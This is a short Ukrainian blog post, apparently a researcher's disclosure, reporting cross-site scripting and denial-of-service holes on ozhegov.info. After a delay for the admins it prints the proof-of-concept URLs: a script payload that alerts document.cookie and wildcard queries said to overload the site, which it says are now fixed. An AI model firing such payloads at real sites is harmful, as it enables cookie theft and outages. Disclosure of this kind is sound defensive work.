Уразливості на ozhegov.info
15:08 18.11.201002.03.2010
У серпні, 11.08.2009, я знайшов Cross-Site Scripting та Denial of Service уразливості на проекті http://ozhegov.info. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
18.11.2010
XSS:
http://ozhegov.info/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
DoS:
http://ozhegov.info/?q=*
http://ozhegov.info/?q=%
Дані уразливості вже виправлені.